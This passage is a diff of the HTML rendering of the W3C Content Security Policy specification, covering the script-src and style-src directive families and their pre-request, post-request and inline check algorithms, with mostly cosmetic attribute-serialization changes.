       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing <a href="#script-post-request">§6.6.1.2 Script directives post-request check</a> on <var>request</var>, <var>response</var>, this directive, and <var>policy</var>.</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="script-src Inline Check" data-level="6.1.11.3" id="script-src-inline"><span class="secno">6.1.11.3. </span><span class="content"> <code>script-src</code> Inline Check </span><a class="self-link" href="#script-src-inline"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check④">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element③">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤⑤">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>element</var> is not <code>null</code> or <var>type</var> is "<code>navigation</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-element-to-source-list">§6.6.3.3 Does element match source list for type and source?</a> on <var>element</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③⓪">value</a>, <var>type</var>,
   and <var>source</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.12" id="directive-script-src-elem"><span class="secno">6.1.12. </span><span class="content"><code>script-src-elem</code></span><a class="self-link" href="#directive-script-src-elem"></a></h4>
@@ -3885,18 +3893,18 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 <pre>directive-name  = "script-src-elem"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list①①">serialized-source-list</a>
 </pre>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="script-src-elem">script-src-elem</dfn> directive applies to all script requests and
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="script-src-elem">script-src-elem</dfn> directive applies to all script requests and
   script blocks. Attributes that execute script (inline event handlers) are
   controlled via <a data-link-type="dfn" href="#script-src-attr" id="ref-for-script-src-attr④"><code>script-src-attr</code></a>.</p>
     <p>As such, the following differences exist when comparing to <code>script-src</code>:</p>
     <ul>
-     <li data-md>
+     <li data-md="">
       <p><code>script-src-elem</code> applies to inline checks whose <code>|type|</code> is "<code>script</code>" and
 "<code>navigation</code>" (and is ignored for inline checks whose <code>|type|</code> is "<code>script attribute</code>").</p>
-     <li data-md>
+     <li data-md="">
       <p><code>script-src-elem</code>'s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③①">value</a> is not used for JavaScript
 execution sink checks that are gated on the "<code>unsafe-eval</code>" check.</p>
-     <li data-md>
+     <li data-md="">
       <p><code>script-src-elem</code> is not used as a fallback for the <code>worker-src</code> directive.
 The <code>worker-src</code> checks still fall back on the <code>script-src</code> directive.</p>
     </ul>
@@ -3904,11 +3912,11 @@ The <code>worker-src</code> checks still fall back on the <code>script-src</code
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①④">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④⑤">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤⑥">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src-elem</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing <a href="#script-pre-request">§6.6.1.1 Script directives pre-request check</a> on <var>request</var>,
   this directive, and <var>policy</var>.</p>
     </ol>
@@ -3916,27 +3924,27 @@ The <code>worker-src</code> checks still fall back on the <code>script-src</code
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①⑤">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④⑥">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③⓪">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤⑦">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src-elem</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing <a href="#script-post-request">§6.6.1.2 Script directives post-request check</a> on <var>request</var>, <var>response</var>, this directive, and <var>policy</var>.</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="script-src-elem Inline Check" data-level="6.1.12.3" id="script-src-elem-inline"><span class="secno">6.1.12.3. </span><span class="content"> <code>script-src-elem</code> Inline Check </span><a class="self-link" href="#script-src-elem-inline"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check⑤">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element④">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤⑧">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>element</var> is not <code>null</code> or <var>type</var> is "<code>navigation</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src-elem</code>, and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-element-to-source-list">§6.6.3.3 Does element match source list for type and source?</a> on <var>element</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③②">value</a>, <var>type</var>,
   and <var>source</var> is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.13" id="directive-script-src-attr"><span class="secno">6.1.13. </span><span class="content"><code>script-src-attr</code></span><a class="self-link" href="#directive-script-src-attr"></a></h4>
@@ -3944,26 +3952,26 @@ The <code>worker-src</code> checks still fall back on the <code>script-src</code
 <pre>directive-name  = "script-src-attr"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list①②">serialized-source-list</a>
 </pre>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="script-src-attr">script-src-attr</dfn> directive applies to event handlers and, if present,
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="script-src-attr">script-src-attr</dfn> directive applies to event handlers and, if present,
   it will override the <code>script-src</code> directive for relevant checks.</p>
     <h5 class="heading settled algorithm" data-algorithm="script-src-attr Inline Check" data-level="6.1.13.1" id="script-src-attr-inline"><span class="secno">6.1.13.1. </span><span class="content"> <code>script-src-attr</code> Inline Check </span><a class="self-link" href="#script-src-attr-inline"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check⑥">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element⑤">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤⑨">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>element</var> is not <code>null</code> or <var>type</var> is "<code>navigation</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src-attr</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-element-to-source-list">§6.6.3.3 Does element match source list for type and source?</a> on <var>element</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③③">value</a>, <var>type</var>,
   and <var>source</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.14" id="directive-style-src"><span class="secno">6.1.14. </span><span class="content"><code>style-src</code></span><a class="self-link" href="#directive-style-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="style-src">style-src</dfn> directive restricts the locations from which style
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="style-src">style-src</dfn> directive restricts the locations from which style
   may be applied to a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①③">Document</a></code>. The syntax for the directive’s name and
   value is described by the following ABNF:</p>
 <pre>directive-name  = "style-src"
@@ -3971,37 +3979,37 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 </pre>
     <p>The <code>style-src</code> directive governs several things:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Style <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④⑦">requests</a> MUST pass through <a href="#should-block-request">§4.1.3 Should request be blocked by Content Security Policy?</a>. This
   includes:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Stylesheet requests originating from a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-link-element" id="ref-for-the-link-element①">link</a></code> element.</p>
-       <li data-md>
+       <li data-md="">
         <p>Stylesheet requests originating from the <a class="css" data-link-type="at-rule" href="https://drafts.csswg.org/css-cascade-4/#at-ruledef-import" id="ref-for-at-ruledef-import"><code>@import</code></a> rule.</p>
-       <li data-md>
+       <li data-md="">
         <p>Stylesheet requests originating from a <code>Link</code> HTTP response header
   field <a data-link-type="biblio" href="#biblio-rfc8288">[RFC8288]</a>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③①">Responses</a> to style requests MUST pass through <a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Inline <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-style-element" id="ref-for-the-style-element">style</a></code> blocks MUST pass through <a href="#should-block-inline">§4.2.4 Should element’s inline type behavior be blocked by Content Security Policy?</a>. The
   styles will be blocked unless every policy allows inline style, either
   implicitly by not specifying a <code>style-src</code> (or <code>default-src</code>) directive,
   or explicitly, by specifying "<code>unsafe-inline</code>", a <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source③">nonce-source</a> or a <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source③">hash-source</a> that matches
   the inline block.</p>
-     <li data-md>
+     <li data-md="">
       <p>The following CSS algorithms are gated on the <code>unsafe-eval</code> source
   expression:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://drafts.csswg.org/cssom-1/#insert-a-css-rule" id="ref-for-insert-a-css-rule">insert a CSS rule</a></p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://drafts.csswg.org/cssom-1/#parse-a-css-rule" id="ref-for-parse-a-css-rule">parse a CSS rule</a>,</p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://drafts.csswg.org/cssom-1/#parse-a-css-declaration-block" id="ref-for-parse-a-css-declaration-block">parse a CSS declaration block</a></p>
-       <li data-md>
+       <li data-md="">
         <p><a data-link-type="dfn" href="https://drafts.csswg.org/cssom-1/#parse-a-group-of-selectors" id="ref-for-parse-a-group-of-selectors">parse a group of selectors</a></p>
       </ol>
       <p>This would include, for example, all invocations of CSSOM’s various <code>cssText</code> setters and <code>insertRule</code> methods <a data-link-type="biblio" href="#biblio-cssom">[CSSOM]</a> <a data-link-type="biblio" href="#biblio-html">[HTML]</a>.</p>
@@ -4011,54 +4019,54 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①⑤">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④⑧">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥⓪">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-nonce-to-source-list">§6.6.2.2 Does nonce match source list?</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata①">cryptographic nonce metadata</a> and this
   directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③④">value</a> is "<code>Matches</code>", return
   "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③⑤">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="style-src Post-request Check" data-level="6.1.14.2" id="style-src-post-request"><span class="secno">6.1.14.2. </span><span class="content"> <code>style-src</code> Post-request Check </span><a class="self-link" href="#style-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①⑥">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④⑨">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③②">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥①">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-nonce-to-source-list">§6.6.2.2 Does nonce match source list?</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata②">cryptographic nonce metadata</a> and this
   directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③⑥">value</a> is "<code>Matches</code>", return
   "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③⑦">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="style-src Inline Check" data-level="6.1.14.3" id="style-src-inline"><span class="secno">6.1.14.3. </span><span class="content"> <code>style-src</code> Inline Check </span><a class="self-link" href="#style-src-inline"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check⑦">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element⑥">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥②">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-element-to-source-list">§6.6.3.3 Does element match source list for type and source?</a> on <var>element</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③⑧">value</a>, <var>type</var>,
   and <var>source</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <p>This directive’s <a data-link-type="dfn" href="#directive-initialization" id="ref-for-directive-initialization①">initialization</a> algorithm is as follows:</p>
-    <p class="issue" id="issue-6fa220c3"><a class="self-link" href="#issue-6fa220c3"></a> Do something interesting to the execution context in order to lock down
+    <p class="issue" id="issue-eba1ebc1"><a class="self-link" href="#issue-eba1ebc1"></a> Do something interesting to the execution context in order to lock down
   interesting CSSOM algorithms. I don’t think CSSOM gives us any hooks here, so
   let’s work with them to put something reasonable together.</p>
     <h4 class="heading settled" data-level="6.1.15" id="directive-style-src-elem"><span class="secno">6.1.15. </span><span class="content"><code>style-src-elem</code></span><a class="self-link" href="#directive-style-src-elem"></a></h4>
@@ -4066,56 +4074,56 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 <pre>directive-name  = "style-src-elem"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list①④">serialized-source-list</a>
 </pre>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="style-src-elem">style-src-elem</dfn> directive governs the behaviour of styles
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="style-src-elem">style-src-elem</dfn> directive governs the behaviour of styles
   except for styles defined in inline attributes.</p>
     <h5 class="heading settled algorithm" data-algorithm="style-src-elem Pre-request Check" data-level="6.1.15.1" id="style-src-elem-pre-request"><span class="secno">6.1.15.1. </span><span class="content"> <code>style-src-elem</code> Pre-request Check </span><a class="self-link" href="#style-src-elem-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①⑥">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑤⓪">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥③">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src-elem</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-nonce-to-source-list">§6.6.2.2 Does nonce match source list?</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata③">cryptographic nonce metadata</a> and this
   directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③⑨">value</a> is "<code>Matches</code>", return
   "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④⓪">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="style-src-elem Post-request Check" data-level="6.1.15.2" id="style-src-elem-post-request"><span class="secno">6.1.15.2. </span><span class="content"> <code>style-src-elem</code> Post-request Check </span><a class="self-link" href="#style-src-elem-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①⑦">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑤①">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③③">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥④">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src-elem</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-nonce-to-source-list">§6.6.2.2 Does nonce match source list?</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata④">cryptographic nonce metadata</a> and this
   directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④①">value</a> is "<code>Matches</code>", return
   "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④②">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="style-src-elem Inline Check" data-level="6.1.15.3" id="style-src-elem-inline"><span class="secno">6.1.15.3. </span><span class="content"> <code>style-src-elem</code> Inline Check </span><a class="self-link" href="#style-src-elem-inline"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check⑧">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element⑦">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥⑤">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src-elem</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-element-to-source-list">§6.6.3.3 Does element match source list for type and source?</a> on <var>element</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④③">value</a>, <var>type</var>,
   and <var>source</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.16" id="directive-style-src-attr"><span class="secno">6.1.16. </span><span class="content"><code>style-src-attr</code></span><a class="self-link" href="#directive-style-src-attr"></a></h4>
@@ -4123,74 +4131,74 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 <pre>directive-name  = "style-src-attr"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list①⑤">serialized-source-list</a>
 </pre>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="style-src-attr">style-src-attr</dfn> directive governs the behaviour of style attributes.</p>
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="style-src-attr">style-src-attr</dfn> directive governs the behaviour of style attributes.</p>
     <h5 class="heading settled algorithm" data-algorithm="style-src-attr Inline Check" data-level="6.1.16.1" id="style-src-attr-inline"><span class="secno">6.1.16.1. </span><span class="content"> <code>style-src-attr</code> Inline Check </span><a class="self-link" href="#style-src-attr-inline"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check⑨">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element⑧">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥⑥">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>style-src-attr</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-element-to-source-list">§6.6.3.3 Does element match source list for type and source?</a> on <var>element</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④④">value</a>, <var>type</var>,
   and <var>source</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.17" id="directive-worker-src"><span class="secno">6.1.17. </span><span class="content"><code>worker-src</code></span><a class="self-link" href="#directive-worker-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="worker-src">worker-src</dfn> directive restricts the URLs which may be loaded as
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="worker-src">worker-src</dfn> directive restricts the URLs which may be loaded as
